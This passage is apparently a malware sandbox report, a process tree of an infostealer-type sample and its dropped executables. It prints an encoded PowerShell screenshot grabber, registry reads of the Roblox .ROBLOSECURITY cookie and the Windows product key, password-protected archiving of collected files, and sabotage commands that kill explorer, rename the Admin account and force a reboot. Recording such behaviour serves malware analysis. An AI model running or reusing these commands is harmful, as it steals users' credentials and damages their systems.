GgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        7⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        
        PID:6020
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\i0oaazqm\i0oaazqm.cmdline"
        9⤵
        
        PID:5608
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES11A0.tmp" "c:\Users\Admin\AppData\Local\Temp\i0oaazqm\CSCEEC68083951840B792DA5425299990E2.TMP"
        10⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5392
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Views/modifies file attributes
        
        PID:5700
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:1836
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5028
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:5688
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Views/modifies file attributes
        
        PID:6136
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5976
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5144
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:5944
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5500
        
        C:\Windows\SysWOW64\tree.com
        
        tree /A /F
        8⤵
        
        PID:5352
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        7⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\getmac.exe
        
        getmac
        8⤵
        
        PID:6040
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"
        7⤵
        
        PID:5264
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 2092
        8⤵
        Kills process with taskkill
        
        PID:5812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2092"
        7⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 2092
        8⤵
        Kills process with taskkill
        
        PID:1508
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3732"
        7⤵
        
        PID:5324
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:6124
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3732
        8⤵
        Kills process with taskkill
        
        PID:5628
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3732"
        7⤵
        
        PID:3744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3732
        8⤵
        Kills process with taskkill
        
        PID:5576
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1392"
        7⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1392
        8⤵
        Kills process with taskkill
        
        PID:2120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1392"
        7⤵
        
        PID:3692
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1392
        8⤵
        Kills process with taskkill
        
        PID:4892
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1156"
        7⤵
        
        PID:5448
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1156
        8⤵
        Kills process with taskkill
        
        PID:2184
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1156"
        7⤵
        
        PID:2904
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1156
        8⤵
        Kills process with taskkill
        
        PID:5404
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1228"
        7⤵
        
        PID:6012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1228
        8⤵
        Kills process with taskkill
        
        PID:5336
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1228"
        7⤵
        
        PID:5620
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 1228
        8⤵
        Kills process with taskkill
        
        PID:5392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4652"
        7⤵
        
        PID:5528
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 4652
        8⤵
        Kills process with taskkill
        
        PID:4360
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4652"
        7⤵
        
        PID:1404
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 4652
        8⤵
        Kills process with taskkill
        
        PID:3936
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 228"
        7⤵
        
        PID:1160
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 228
        8⤵
        Kills process with taskkill
        
        PID:5496
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 228"
        7⤵
        
        PID:5816
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 228
        8⤵
        Kills process with taskkill
        
        PID:592
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
        7⤵
        
        PID:6136
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:5700
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3892
        8⤵
        Kills process with taskkill
        
        PID:4972
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3892"
        7⤵
        
        PID:5856
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 3892
        8⤵
        Kills process with taskkill
        
        PID:5536
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2044"
        7⤵
        
        PID:4036
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 2044
        8⤵
        Kills process with taskkill
        
        PID:6000
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2044"
        7⤵
        
        PID:2744
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 2044
        8⤵
        Kills process with taskkill
        
        PID:5920
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
        7⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 400
        8⤵
        Kills process with taskkill
        
        PID:3968
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 400"
        7⤵
        
        PID:1016
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 400
        8⤵
        Kills process with taskkill
        
        PID:5188
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5800"
        7⤵
        
        PID:620
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 5800
        8⤵
        Kills process with taskkill
        
        PID:5280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2912"
        7⤵
        
        PID:5364
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 2912
        8⤵
        Kills process with taskkill
        
        PID:5444
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6044"
        7⤵
        
        PID:5220
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 6044
        8⤵
        Kills process with taskkill
        
        PID:5252
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI45042\rar.exe a -r -hp"blank006" "C:\Users\Admin\AppData\Local\Temp\7EROL.zip" *"
        7⤵
        
        PID:1160
        
        C:\Users\Admin\AppData\Local\Temp\_MEI45042\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI45042\rar.exe a -r -hp"blank006" "C:\Users\Admin\AppData\Local\Temp\7EROL.zip" *
        8⤵
        Executes dropped EXE
        
        PID:1340
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        7⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic os get Caption
        8⤵
        
        PID:1392
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        7⤵
        
        PID:4492
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        8⤵
        
        PID:4436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:5720
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        7⤵
        
        PID:4388
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        
        PID:4396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:3968
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:6108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        7⤵
        
        PID:1724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        8⤵
        
        PID:692
- - C:\Users\Admin\AppData\Local\Temp\tmp7F2A.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp7F2A.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2420
- - C:\Users\Admin\AppData\Local\Temp\tmp669F.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp669F.tmp.exe"
    3⤵
    - Executes dropped EXE
    PID:5672
- - C:\Users\Admin\AppData\Local\Temp\tmp1CB2.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp1CB2.tmp.exe"
    3⤵
    - Disables RegEdit via registry modification
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies WinLogon
    - Drops file in Windows directory
    - Modifies Control Panel
    - Modifies Internet Explorer settings
    - Modifies Internet Explorer start page
    - Modifies registry class
    - System policy modification
    PID:4000
- - C:\Users\Admin\AppData\Local\Temp\tmp9993.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmp9993.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Modifies WinLogon
    - Sets desktop wallpaper using registry
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    PID:3824
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
      4⤵
      PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im explorer.exe
        5⤵
        Kills process with taskkill
        
        PID:1724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im taskmgr.exe
        5⤵
        Kills process with taskkill
        
        PID:5800
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' set FullName='UR NEXT'
        5⤵
        
        PID:5228
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic useraccount where name='Admin' rename 'UR NEXT'
        5⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\shutdown.exe
        
        shutdown /f /r /t 0
        5⤵
        
        PID:5848
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 4412
      4⤵
      Program crash
      PID:3904
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 4484
      4⤵
      Program crash
      PID:5408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4240
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffee4b0ab58,0x7ffee4b0ab68,0x7ffee4b0ab78
  2⤵
  PID:2092
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1424 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:2
  2⤵
  PID:4952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:2120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2288 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3140 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:1608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3160 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:4064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4324 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3968 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:4364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4480 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4492 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:3864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4448 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:3076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4740 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:8
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4780 --field-trial-handle=1960,i,12542684128337714316,3593328280631095710,131072 /prefetch:1
  2⤵
  PID:3552
- C:\Program Files\Google\Chrome\Application\chrome.exe
